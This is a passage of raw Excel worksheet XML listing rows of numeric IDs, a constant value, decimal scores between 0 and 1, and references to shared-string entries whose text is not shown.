    </row>
    <row r="4569" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4569" s="1">
        <v>4567</v>
      </c>
      <c r="B4569">
        <v>6582</v>
      </c>
      <c r="C4569">
        <v>6582</v>
      </c>
      <c r="D4569">
        <v>2</v>
      </c>
      <c r="E4569">
        <v>0.48910000920295721</v>
      </c>
      <c r="F4569" t="s">
        <v>5592</v>
      </c>
      <c r="G4569" t="s">
        <v>9032</v>
      </c>
      <c r="H4569" t="s">
        <v>9033</v>
      </c>
    </row>
    <row r="4570" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4570" s="1">
        <v>4568</v>
      </c>
      <c r="B4570">
        <v>3005</v>
      </c>
      <c r="C4570">
        <v>3005</v>
      </c>
      <c r="D4570">
        <v>2</v>
      </c>
      <c r="E4570">
        <v>0.60589998960494995</v>
      </c>
      <c r="F4570" t="s">
        <v>5592</v>
      </c>
      <c r="G4570" t="s">
        <v>9034</v>
      </c>
      <c r="H4570" t="s">
        <v>9035</v>
      </c>
    </row>
    <row r="4571" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4571" s="1">
        <v>4569</v>
      </c>
      <c r="B4571">
        <v>6580</v>
      </c>
      <c r="C4571">
        <v>6580</v>
      </c>
      <c r="D4571">
        <v>2</v>
      </c>
      <c r="E4571">
        <v>0.99849998950958252</v>
      </c>
      <c r="F4571" t="s">
        <v>5592</v>
      </c>
      <c r="G4571" t="s">
        <v>9036</v>
      </c>
      <c r="H4571" t="s">
        <v>9037</v>
      </c>
    </row>
    <row r="4572" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4572" s="1">
        <v>4570</v>
      </c>
      <c r="B4572">
        <v>6660</v>
      </c>
      <c r="C4572">
        <v>6660</v>
      </c>
      <c r="D4572">
        <v>2</v>
      </c>
      <c r="E4572">
        <v>0.60670000314712524</v>
      </c>
      <c r="F4572" t="s">
        <v>5592</v>
      </c>
      <c r="G4572" t="s">
        <v>9038</v>
      </c>
      <c r="H4572" t="s">
        <v>9039</v>
      </c>
    </row>
    <row r="4573" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4573" s="1">
        <v>4571</v>
      </c>
      <c r="B4573">
        <v>3008</v>
      </c>
      <c r="C4573">
        <v>3008</v>
      </c>
      <c r="D4573">
        <v>2</v>
      </c>
      <c r="E4573">
        <v>0.46189999580383301</v>
      </c>
      <c r="F4573" t="s">
        <v>5592</v>
      </c>
      <c r="G4573" t="s">
        <v>9040</v>
      </c>
      <c r="H4573" t="s">
        <v>9041</v>
      </c>
    </row>
    <row r="4574" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4574" s="1">
        <v>4572</v>
      </c>
      <c r="B4574">
        <v>6579</v>
      </c>
      <c r="C4574">
        <v>6579</v>
      </c>
      <c r="D4574">
        <v>2</v>
      </c>
      <c r="E4574">
        <v>0.99769997596740723</v>
      </c>
      <c r="F4574" t="s">
        <v>5592</v>
      </c>
      <c r="G4574" t="s">
        <v>9042</v>
      </c>
      <c r="H4574" t="s">
        <v>9043</v>
      </c>
    </row>
    <row r="4575" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4575" s="1">
        <v>4573</v>
      </c>
      <c r="B4575">
        <v>3016</v>
      </c>
      <c r="C4575">
        <v>3016</v>
      </c>
      <c r="D4575">
        <v>2</v>
      </c>
      <c r="E4575">
        <v>0.98979997634887695</v>
      </c>
      <c r="F4575" t="s">
        <v>5592</v>
      </c>
      <c r="G4575" t="s">
        <v>9044</v>
      </c>
      <c r="H4575" t="s">
        <v>9045</v>
      </c>
    </row>
    <row r="4576" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4576" s="1">
        <v>4574</v>
      </c>
      <c r="B4576">
        <v>6577</v>
      </c>
      <c r="C4576">
        <v>6577</v>
      </c>
      <c r="D4576">
        <v>2</v>
      </c>
      <c r="E4576">
        <v>0.99779999256134033</v>
      </c>
      <c r="F4576" t="s">
        <v>5592</v>
      </c>
      <c r="G4576" t="s">
        <v>9046</v>
      </c>
      <c r="H4576" t="s">
        <v>9047</v>
      </c>
    </row>
    <row r="4577" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4577" s="1">
        <v>4575</v>
      </c>
      <c r="B4577">
        <v>3019</v>
      </c>
      <c r="C4577">
        <v>3019</v>
      </c>
      <c r="D4577">
        <v>2</v>
      </c>
      <c r="E4577">
        <v>0.74390000104904175</v>
      </c>
      <c r="F4577" t="s">
        <v>5592</v>
      </c>
      <c r="G4577" t="s">
        <v>9048</v>
      </c>
      <c r="H4577" t="s">
        <v>9049</v>
      </c>
    </row>
    <row r="4578" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4578" s="1">
        <v>4576</v>
      </c>
      <c r="B4578">
        <v>3021</v>
      </c>
      <c r="C4578">
        <v>3021</v>
      </c>
      <c r="D4578">
        <v>2</v>
      </c>
      <c r="E4578">
        <v>0.71160000562667847</v>
      </c>
      <c r="F4578" t="s">
        <v>5592</v>
      </c>
      <c r="G4578" t="s">
        <v>9050</v>
      </c>
      <c r="H4578" t="s">
        <v>9051</v>
      </c>
    </row>
    <row r="4579" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4579" s="1">
        <v>4577</v>
      </c>
      <c r="B4579">
        <v>6576</v>
      </c>
      <c r="C4579">
        <v>6576</v>
      </c>
      <c r="D4579">
        <v>2</v>
      </c>
      <c r="E4579">
        <v>0.96020001173019409</v>
      </c>
      <c r="F4579" t="s">
        <v>5592</v>
      </c>
      <c r="G4579" t="s">
        <v>9052</v>
      </c>
      <c r="H4579" t="s">
        <v>9053</v>
      </c>
    </row>
    <row r="4580" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4580" s="1">
        <v>4578</v>
      </c>
      <c r="B4580">
        <v>6575</v>
      </c>
      <c r="C4580">
        <v>6575</v>
      </c>
      <c r="D4580">
        <v>2</v>
      </c>
      <c r="E4580">
        <v>0.92320001125335693</v>
      </c>
      <c r="F4580" t="s">
        <v>5592</v>
      </c>
      <c r="G4580" t="s">
        <v>9054</v>
      </c>
      <c r="H4580" t="s">
        <v>9055</v>
      </c>
    </row>
    <row r="4581" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4581" s="1">
        <v>4579</v>
      </c>
      <c r="B4581">
        <v>6574</v>
      </c>
      <c r="C4581">
        <v>6574</v>
      </c>
      <c r="D4581">
        <v>2</v>
      </c>
      <c r="E4581">
        <v>0.79890000820159912</v>
      </c>
      <c r="F4581" t="s">
        <v>5592</v>
      </c>
      <c r="G4581" t="s">
        <v>9056</v>
      </c>
      <c r="H4581" t="s">
        <v>9057</v>
      </c>
    </row>
    <row r="4582" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4582" s="1">
        <v>4580</v>
      </c>
      <c r="B4582">
        <v>6573</v>
      </c>
      <c r="C4582">
        <v>6573</v>
      </c>
      <c r="D4582">
        <v>2</v>
      </c>
      <c r="E4582">
        <v>0.72369998693466187</v>
      </c>
      <c r="F4582" t="s">
        <v>5592</v>
      </c>
      <c r="G4582" t="s">
        <v>9058</v>
      </c>
      <c r="H4582" t="s">
        <v>9059</v>
      </c>
    </row>
    <row r="4583" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4583" s="1">
        <v>4581</v>
      </c>
      <c r="B4583">
        <v>3031</v>
      </c>
      <c r="C4583">
        <v>3031</v>
      </c>
      <c r="D4583">
        <v>2</v>
      </c>
      <c r="E4583">
        <v>0.38699999451637268</v>
      </c>
      <c r="F4583" t="s">
        <v>5592</v>
      </c>
      <c r="G4583" t="s">
        <v>9060</v>
      </c>
      <c r="H4583" t="s">
        <v>9061</v>
      </c>
    </row>
    <row r="4584" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4584" s="1">
        <v>4582</v>
      </c>
      <c r="B4584">
        <v>3009</v>
      </c>
      <c r="C4584">
        <v>3009</v>
      </c>
      <c r="D4584">
        <v>2</v>
      </c>
      <c r="E4584">
        <v>0.66600000858306885</v>
      </c>
      <c r="F4584" t="s">
        <v>5592</v>
      </c>
      <c r="G4584" t="s">
        <v>9062</v>
      </c>
      <c r="H4584" t="s">
        <v>9063</v>
      </c>
    </row>
    <row r="4585" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4585" s="1">
        <v>4583</v>
      </c>
      <c r="B4585">
        <v>3099</v>
      </c>
      <c r="C4585">
        <v>3099</v>
      </c>
      <c r="D4585">
        <v>2</v>
      </c>
      <c r="E4585">
        <v>0.64429998397827148</v>
      </c>
      <c r="F4585" t="s">
        <v>5592</v>
      </c>
      <c r="G4585" t="s">
        <v>9064</v>
      </c>
      <c r="H4585" t="s">
        <v>9065</v>
      </c>
    </row>
    <row r="4586" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4586" s="1">
        <v>4584</v>
      </c>
      <c r="B4586">
        <v>2859</v>
      </c>
      <c r="C4586">
        <v>2859</v>
      </c>
      <c r="D4586">
        <v>2</v>
      </c>
      <c r="E4586">
        <v>0.99360001087188721</v>
      </c>
      <c r="F4586" t="s">
        <v>5592</v>
      </c>
      <c r="G4586" t="s">
        <v>9066</v>
      </c>
      <c r="H4586" t="s">
        <v>9067</v>
      </c>
    </row>
    <row r="4587" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4587" s="1">
        <v>4585</v>
      </c>
      <c r="B4587">
        <v>2833</v>
      </c>
      <c r="C4587">
        <v>2833</v>
      </c>
      <c r="D4587">
        <v>2</v>
      </c>
      <c r="E4587">
        <v>0.48109999299049377</v>
      </c>
      <c r="F4587" t="s">
        <v>5592</v>
      </c>
      <c r="G4587" t="s">
        <v>9068</v>
      </c>
      <c r="H4587" t="s">
        <v>9069</v>
      </c>
    </row>
    <row r="4588" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4588" s="1">
        <v>4586</v>
      </c>
      <c r="B4588">
        <v>6733</v>
      </c>
      <c r="C4588">
        <v>6733</v>
      </c>
      <c r="D4588">
        <v>2</v>
      </c>
      <c r="E4588">
        <v>0.99510002136230469</v>
      </c>
      <c r="F4588" t="s">
        <v>5592</v>
      </c>
      <c r="G4588" t="s">
        <v>9070</v>
      </c>
      <c r="H4588" t="s">
        <v>9071</v>
      </c>
    </row>
    <row r="4589" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4589" s="1">
        <v>4587</v>
      </c>
      <c r="B4589">
        <v>2683</v>
      </c>
      <c r="C4589">
        <v>2683</v>
      </c>
      <c r="D4589">
        <v>2</v>
      </c>
      <c r="E4589">
        <v>0.50169998407363892</v>
      </c>
      <c r="F4589" t="s">
        <v>5592</v>
      </c>
      <c r="G4589" t="s">
        <v>9072</v>
      </c>
      <c r="H4589" t="s">
        <v>9073</v>
      </c>
    </row>
    <row r="4590" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4590" s="1">
        <v>4588</v>
      </c>
      <c r="B4590">
        <v>2684</v>
      </c>
      <c r="C4590">
        <v>2684</v>
      </c>
      <c r="D4590">
        <v>2</v>
      </c>
      <c r="E4590">
        <v>0.99699997901916504</v>
      </c>
      <c r="F4590" t="s">
        <v>5592</v>
      </c>
      <c r="G4590" t="s">
        <v>9074</v>
      </c>
      <c r="H4590" t="s">
        <v>9075</v>
      </c>
    </row>
    <row r="4591" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4591" s="1">
        <v>4589</v>
      </c>
      <c r="B4591">
        <v>6730</v>
      </c>
      <c r="C4591">
        <v>6730</v>
      </c>
      <c r="D4591">
        <v>2</v>
      </c>
      <c r="E4591">
        <v>0.69319999217987061</v>
      </c>
      <c r="F4591" t="s">
        <v>5592</v>
      </c>
      <c r="G4591" t="s">
        <v>9076</v>
      </c>
      <c r="H4591" t="s">
        <v>9077</v>
      </c>
    </row>
    <row r="4592" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4592" s="1">
        <v>4590</v>
      </c>
      <c r="B4592">
        <v>6729</v>
      </c>
      <c r="C4592">
        <v>6729</v>
      </c>
      <c r="D4592">
        <v>2</v>
      </c>
      <c r="E4592">
        <v>0.99150002002716064</v>
      </c>
      <c r="F4592" t="s">
        <v>5592</v>
      </c>
      <c r="G4592" t="s">
        <v>9078</v>
      </c>
      <c r="H4592" t="s">
        <v>9079</v>
      </c>
    </row>
    <row r="4593" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4593" s="1">
        <v>4591</v>
      </c>
      <c r="B4593">
        <v>6728</v>
      </c>
      <c r="C4593">
        <v>6728</v>
      </c>
      <c r="D4593">
        <v>2</v>
      </c>
      <c r="E4593">
        <v>0.87629997730255127</v>
      </c>
      <c r="F4593" t="s">
        <v>5592</v>
      </c>
      <c r="G4593" t="s">
        <v>9080</v>
      </c>
      <c r="H4593" t="s">
        <v>9081</v>
      </c>
    </row>
    <row r="4594" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4594" s="1">
        <v>4592</v>
      </c>
      <c r="B4594">
        <v>2690</v>
      </c>
      <c r="C4594">
        <v>2690</v>
      </c>
      <c r="D4594">
        <v>2</v>
      </c>
      <c r="E4594">
        <v>0.99510002136230469</v>
      </c>
      <c r="F4594" t="s">
        <v>5592</v>
      </c>
      <c r="G4594" t="s">
        <v>9082</v>
      </c>
      <c r="H4594" t="s">
        <v>9083</v>
      </c>
    </row>
    <row r="4595" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4595" s="1">
        <v>4593</v>
      </c>
      <c r="B4595">
        <v>2694</v>
      </c>
      <c r="C4595">
        <v>2694</v>
      </c>
      <c r="D4595">
        <v>2</v>
      </c>
      <c r="E4595">
        <v>0.99550002813339233</v>
      </c>
      <c r="F4595" t="s">
        <v>5592</v>
      </c>
      <c r="G4595" t="s">
        <v>9084</v>
      </c>
      <c r="H4595" t="s">
        <v>9085</v>
      </c>
    </row>
    <row r="4596" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4596" s="1">
        <v>4594</v>
      </c>
      <c r="B4596">
        <v>6723</v>
      </c>
      <c r="C4596">
        <v>6723</v>
      </c>
      <c r="D4596">
        <v>2</v>
      </c>
      <c r="E4596">
        <v>0.96850001811981201</v>
      </c>
      <c r="F4596" t="s">
        <v>5592</v>
      </c>
      <c r="G4596" t="s">
        <v>9086</v>
      </c>
      <c r="H4596" t="s">
        <v>9087</v>
      </c>
    </row>
    <row r="4597" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4597" s="1">
        <v>4595</v>
      </c>
      <c r="B4597">
        <v>2697</v>
      </c>
      <c r="C4597">
        <v>2697</v>
      </c>
      <c r="D4597">
        <v>2</v>
      </c>
      <c r="E4597">
        <v>0.89060002565383911</v>
      </c>
      <c r="F4597" t="s">
        <v>5592</v>
      </c>
      <c r="G4597" t="s">
        <v>9088</v>
      </c>
      <c r="H4597" t="s">
        <v>9089</v>
      </c>
    </row>
    <row r="4598" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4598" s="1">
        <v>4596</v>
      </c>
      <c r="B4598">
        <v>2698</v>
      </c>
      <c r="C4598">
        <v>2698</v>
      </c>
      <c r="D4598">
        <v>2</v>
      </c>
      <c r="E4598">
        <v>0.50290000438690186</v>
      </c>
      <c r="F4598" t="s">
        <v>5592</v>
      </c>
      <c r="G4598" t="s">
        <v>9090</v>
      </c>
      <c r="H4598" t="s">
        <v>9091</v>
      </c>
    </row>
    <row r="4599" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4599" s="1">
        <v>4597</v>
      </c>
      <c r="B4599">
        <v>2700</v>
      </c>
      <c r="C4599">
        <v>2700</v>
      </c>
      <c r="D4599">
        <v>2</v>
      </c>
      <c r="E4599">
        <v>0.88289999961853027</v>
      </c>
      <c r="F4599" t="s">
        <v>5592</v>
      </c>
      <c r="G4599" t="s">
        <v>9092</v>
      </c>
      <c r="H4599" t="s">
        <v>9093</v>
      </c>
    </row>
    <row r="4600" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4600" s="1">
        <v>4598</v>
      </c>
      <c r="B4600">
        <v>2701</v>
      </c>
      <c r="C4600">
        <v>2701</v>
      </c>
      <c r="D4600">
        <v>2</v>
      </c>
      <c r="E4600">
        <v>0.99199998378753662</v>
      </c>
      <c r="F4600" t="s">
        <v>5592</v>
      </c>
      <c r="G4600" t="s">
        <v>9094</v>
      </c>
      <c r="H4600" t="s">
        <v>9095</v>
      </c>
    </row>
    <row r="4601" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4601" s="1">
        <v>4599</v>
      </c>
      <c r="B4601">
        <v>2703</v>
      </c>
      <c r="C4601">
        <v>2703</v>
      </c>
      <c r="D4601">
        <v>2</v>
      </c>
      <c r="E4601">
        <v>0.66039997339248657</v>
      </c>
      <c r="F4601" t="s">
        <v>5592</v>
      </c>
      <c r="G4601" t="s">
        <v>9096</v>
      </c>
      <c r="H4601" t="s">
        <v>9097</v>
      </c>
    </row>
    <row r="4602" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4602" s="1">
        <v>4600</v>
      </c>
      <c r="B4602">
        <v>2705</v>
      </c>
      <c r="C4602">
        <v>2705</v>
      </c>
      <c r="D4602">
        <v>2</v>
      </c>
      <c r="E4602">
        <v>0.76959997415542603</v>
      </c>
      <c r="F4602" t="s">
        <v>5592</v>
      </c>
      <c r="G4602" t="s">
        <v>9098</v>
      </c>
      <c r="H4602" t="s">
        <v>9099</v>
      </c>
    </row>
    <row r="4603" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4603" s="1">
        <v>4601</v>
      </c>
      <c r="B4603">
        <v>2706</v>
      </c>
      <c r="C4603">
        <v>2706</v>
      </c>
      <c r="D4603">
        <v>2</v>
      </c>
      <c r="E4603">
        <v>0.86379998922348022</v>
      </c>
      <c r="F4603" t="s">
        <v>5592</v>
      </c>
      <c r="G4603" t="s">
        <v>9100</v>
      </c>
      <c r="H4603" t="s">
        <v>9101</v>
      </c>
    </row>
    <row r="4604" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4604" s="1">
        <v>4602</v>
      </c>
      <c r="B4604">
        <v>6717</v>
      </c>
      <c r="C4604">
        <v>6717</v>
      </c>
      <c r="D4604">
        <v>2</v>
      </c>
      <c r="E4604">
        <v>0.85479998588562012</v>
      </c>
      <c r="F4604" t="s">
        <v>5592</v>
      </c>
      <c r="G4604" t="s">
        <v>9102</v>
      </c>
      <c r="H4604" t="s">
        <v>9103</v>
      </c>
    </row>
    <row r="4605" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4605" s="1">
        <v>4603</v>
      </c>
      <c r="B4605">
        <v>2708</v>
      </c>
      <c r="C4605">
        <v>2708</v>
      </c>
      <c r="D4605">
        <v>2</v>
      </c>
      <c r="E4605">
        <v>0.89639997482299805</v>
      </c>
      <c r="F4605" t="s">
        <v>5592</v>
      </c>
      <c r="G4605" t="s">
        <v>9104</v>
      </c>
      <c r="H4605" t="s">
        <v>9105</v>
      </c>
    </row>
    <row r="4606" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4606" s="1">
        <v>4604</v>
      </c>
      <c r="B4606">
        <v>6715</v>
      </c>
      <c r="C4606">
        <v>6715</v>
      </c>
      <c r="D4606">
        <v>2</v>
      </c>
      <c r="E4606">
        <v>0.65539997816085815</v>
      </c>
      <c r="F4606" t="s">
        <v>5592</v>
      </c>
      <c r="G4606" t="s">
        <v>9106</v>
      </c>
      <c r="H4606" t="s">
        <v>9107</v>
      </c>
    </row>
    <row r="4607" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4607" s="1">
        <v>4605</v>
      </c>
      <c r="B4607">
        <v>6714</v>
      </c>
      <c r="C4607">
        <v>6714</v>
      </c>
      <c r="D4607">
        <v>2</v>
      </c>
      <c r="E4607">
        <v>0.40520000457763672</v>
      </c>
      <c r="F4607" t="s">
        <v>5592</v>
      </c>
      <c r="G4607" t="s">
        <v>9108</v>
      </c>
      <c r="H4607" t="s">
        <v>9109</v>
      </c>
    </row>
    <row r="4608" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4608" s="1">
        <v>4606</v>
      </c>
      <c r="B4608">
        <v>2713</v>
      </c>
      <c r="C4608">
        <v>2713</v>
      </c>
      <c r="D4608">
        <v>2</v>
      </c>
      <c r="E4608">
        <v>0.82440000772476196</v>
      </c>
      <c r="F4608" t="s">
        <v>5592</v>
      </c>
      <c r="G4608" t="s">
        <v>9110</v>
      </c>
      <c r="H4608" t="s">
        <v>9111</v>
      </c>
    </row>
    <row r="4609" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4609" s="1">
        <v>4607</v>
      </c>
      <c r="B4609">
        <v>6734</v>
      </c>
      <c r="C4609">
        <v>6734</v>
      </c>
      <c r="D4609">
        <v>2</v>
      </c>
      <c r="E4609">
        <v>0.99949997663497925</v>
      </c>
      <c r="F4609" t="s">
        <v>5592</v>
      </c>
      <c r="G4609" t="s">
        <v>9112</v>
      </c>
      <c r="H4609" t="s">
        <v>9113</v>
      </c>
    </row>
    <row r="4610" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4610" s="1">
        <v>4608</v>
      </c>
      <c r="B4610">
        <v>2719</v>
      </c>
      <c r="C4610">
        <v>2719</v>
      </c>
      <c r="D4610">
        <v>2</v>
      </c>
      <c r="E4610">
        <v>0.55430001020431519</v>
      </c>
      <c r="F4610" t="s">
        <v>5592</v>
      </c>
      <c r="G4610" t="s">
        <v>9114</v>
      </c>
      <c r="H4610" t="s">
        <v>9115</v>
      </c>
    </row>
    <row r="4611" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4611" s="1">
        <v>4609</v>
      </c>
      <c r="B4611">
        <v>2678</v>
      </c>
      <c r="C4611">
        <v>2678</v>
      </c>
      <c r="D4611">
        <v>2</v>
      </c>
      <c r="E4611">
        <v>0.44299998879432678</v>
      </c>
      <c r="F4611" t="s">
        <v>5592</v>
      </c>
      <c r="G4611" t="s">
        <v>9116</v>
      </c>
      <c r="H4611" t="s">
        <v>9117</v>
      </c>
    </row>
    <row r="4612" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4612" s="1">
        <v>4610</v>
      </c>
      <c r="B4612">
        <v>6736</v>
      </c>
      <c r="C4612">
        <v>6736</v>
      </c>
      <c r="D4612">
        <v>2</v>
      </c>
      <c r="E4612">
        <v>0.99949997663497925</v>
      </c>
      <c r="F4612" t="s">
        <v>5592</v>
      </c>
      <c r="G4612" t="s">
        <v>9118</v>
      </c>
      <c r="H4612" t="s">
        <v>9119</v>
      </c>
    </row>
    <row r="4613" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4613" s="1">
        <v>4611</v>
      </c>
      <c r="B4613">
        <v>6747</v>
      </c>
      <c r="C4613">
        <v>6747</v>
      </c>
      <c r="D4613">
        <v>2</v>
      </c>
      <c r="E4613">
        <v>0.83969998359680176</v>
      </c>
      <c r="F4613" t="s">
        <v>5592</v>
      </c>
      <c r="G4613" t="s">
        <v>9120</v>
      </c>
      <c r="H4613" t="s">
        <v>9121</v>
      </c>
    </row>
    <row r="4614" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4614" s="1">
        <v>4612</v>
      </c>
      <c r="B4614">
        <v>2647</v>
      </c>
      <c r="C4614">
        <v>2647</v>
      </c>
      <c r="D4614">
        <v>2</v>
      </c>
      <c r="E4614">
        <v>0.95020002126693726</v>
      </c>
      <c r="F4614" t="s">
        <v>5592</v>
      </c>
      <c r="G4614" t="s">
        <v>9122</v>
      </c>
      <c r="H4614" t="s">
        <v>9123</v>
      </c>
    </row>
    <row r="4615" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4615" s="1">
        <v>4613</v>
      </c>
      <c r="B4615">
        <v>6746</v>
      </c>
      <c r="C4615">
        <v>6746</v>
      </c>
      <c r="D4615">
        <v>2</v>
      </c>
      <c r="E4615">
        <v>0.95819997787475586</v>
      </c>
      <c r="F4615" t="s">
        <v>5592</v>
      </c>
      <c r="G4615" t="s">
        <v>9124</v>
      </c>
      <c r="H4615" t="s">
        <v>9125</v>
      </c>
    </row>
    <row r="4616" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4616" s="1">
        <v>4614</v>
      </c>
      <c r="B4616">
        <v>2649</v>
      </c>
      <c r="C4616">
        <v>2649</v>
      </c>
      <c r="D4616">
        <v>2</v>
      </c>
      <c r="E4616">
        <v>0.63880002498626709</v>
      </c>
      <c r="F4616" t="s">
        <v>5592</v>
      </c>
      <c r="G4616" t="s">
        <v>9126</v>
      </c>
      <c r="H4616" t="s">
        <v>9127</v>
      </c>
    </row>
    <row r="4617" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4617" s="1">
        <v>4615</v>
      </c>
      <c r="B4617">
        <v>2650</v>
      </c>
      <c r="C4617">
        <v>2650</v>
      </c>
      <c r="D4617">
        <v>2</v>
      </c>
      <c r="E4617">
        <v>0.96420001983642578</v>
      </c>
      <c r="F4617" t="s">
        <v>5592</v>
      </c>
      <c r="G4617" t="s">
        <v>9128</v>
      </c>
      <c r="H4617" t="s">
        <v>9129</v>
      </c>
    </row>
    <row r="4618" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4618" s="1">
        <v>4616</v>
      </c>
      <c r="B4618">
        <v>2651</v>
      </c>
      <c r="C4618">
        <v>2651</v>
      </c>
      <c r="D4618">
        <v>2</v>
      </c>
      <c r="E4618">
        <v>0.99580001831054688</v>
      </c>
      <c r="F4618" t="s">
        <v>5592</v>
      </c>
      <c r="G4618" t="s">
        <v>9130</v>
      </c>
      <c r="H4618" t="s">
        <v>9131</v>
      </c>
    </row>
    <row r="4619" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4619" s="1">
        <v>4617</v>
      </c>
      <c r="B4619">
        <v>6745</v>
      </c>
      <c r="C4619">
        <v>6745</v>
      </c>
      <c r="D4619">
        <v>2</v>
      </c>
      <c r="E4619">
        <v>0.86349999904632568</v>
      </c>
      <c r="F4619" t="s">
        <v>5592</v>
      </c>
      <c r="G4619" t="s">
        <v>9132</v>
      </c>
      <c r="H4619" t="s">
        <v>9133</v>
      </c>
    </row>
    <row r="4620" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4620" s="1">
        <v>4618</v>
      </c>
      <c r="B4620">
        <v>6744</v>
      </c>
      <c r="C4620">
        <v>6744</v>
      </c>
      <c r="D4620">
        <v>2</v>
      </c>
      <c r="E4620">
        <v>0.99250000715255737</v>
      </c>
      <c r="F4620" t="s">
        <v>5592</v>
      </c>
      <c r="G4620" t="s">
        <v>9134</v>
      </c>
      <c r="H4620" t="s">
        <v>9135</v>
      </c>
    </row>
    <row r="4621" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4621" s="1">
        <v>4619</v>
      </c>
      <c r="B4621">
        <v>6742</v>
      </c>
      <c r="C4621">
        <v>6742</v>
      </c>
      <c r="D4621">
        <v>2</v>
      </c>
      <c r="E4621">
        <v>0.68720000982284546</v>
      </c>
      <c r="F4621" t="s">
        <v>5592</v>
      </c>
      <c r="G4621" t="s">
        <v>9136</v>
      </c>
      <c r="H4621" t="s">
        <v>9137</v>
      </c>
    </row>
    <row r="4622" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4622" s="1">
        <v>4620</v>
      </c>
      <c r="B4622">
        <v>2660</v>
      </c>
      <c r="C4622">
        <v>2660</v>
      </c>
      <c r="D4622">
        <v>2</v>
      </c>
      <c r="E4622">
        <v>0.58069998025894165</v>
      </c>
      <c r="F4622" t="s">
        <v>5592</v>
      </c>
      <c r="G4622" t="s">
        <v>9138</v>
      </c>
      <c r="H4622" t="s">
        <v>9139</v>
      </c>
    </row>
    <row r="4623" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4623" s="1">
        <v>4621</v>
      </c>
      <c r="B4623">
        <v>2662</v>
      </c>
      <c r="C4623">
        <v>2662</v>
      </c>
      <c r="D4623">
        <v>2</v>
      </c>
      <c r="E4623">
        <v>0.47330000996589661</v>
      </c>
      <c r="F4623" t="s">
        <v>5592</v>
      </c>
      <c r="G4623" t="s">
        <v>9140</v>
      </c>
      <c r="H4623" t="s">
        <v>9141</v>
      </c>
    </row>
    <row r="4624" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4624" s="1">
        <v>4622</v>
      </c>
      <c r="B4624">
        <v>2663</v>
      </c>
      <c r="C4624">
        <v>2663</v>
      </c>
      <c r="D4624">
        <v>2</v>
      </c>
      <c r="E4624">
        <v>0.98970001935958862</v>
      </c>
      <c r="F4624" t="s">
        <v>5592</v>
      </c>
      <c r="G4624" t="s">
        <v>9142</v>
      </c>
      <c r="H4624" t="s">
        <v>9143</v>
      </c>
    </row>
    <row r="4625" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4625" s="1">
        <v>4623</v>
      </c>
      <c r="B4625">
        <v>6740</v>
      </c>
      <c r="C4625">
        <v>6740</v>
      </c>
      <c r="D4625">
        <v>2</v>
      </c>
      <c r="E4625">
        <v>0.99900001287460327</v>
      </c>
      <c r="F4625" t="s">
        <v>5592</v>
      </c>
      <c r="G4625" t="s">
        <v>9144</v>
      </c>
      <c r="H4625" t="s">
        <v>9145</v>
      </c>
    </row>
    <row r="4626" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4626" s="1">
        <v>4624</v>
      </c>
      <c r="B4626">
        <v>2666</v>
      </c>
      <c r="C4626">
        <v>2666</v>
      </c>
      <c r="D4626">
        <v>2</v>
      </c>
      <c r="E4626">
        <v>0.62870001792907715</v>
      </c>
      <c r="F4626" t="s">
        <v>5592</v>
      </c>
      <c r="G4626" t="s">
        <v>9146</v>
      </c>
      <c r="H4626" t="s">
        <v>9147</v>
      </c>
    </row>
    <row r="4627" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4627" s="1">
        <v>4625</v>
      </c>
      <c r="B4627">
        <v>6739</v>
      </c>
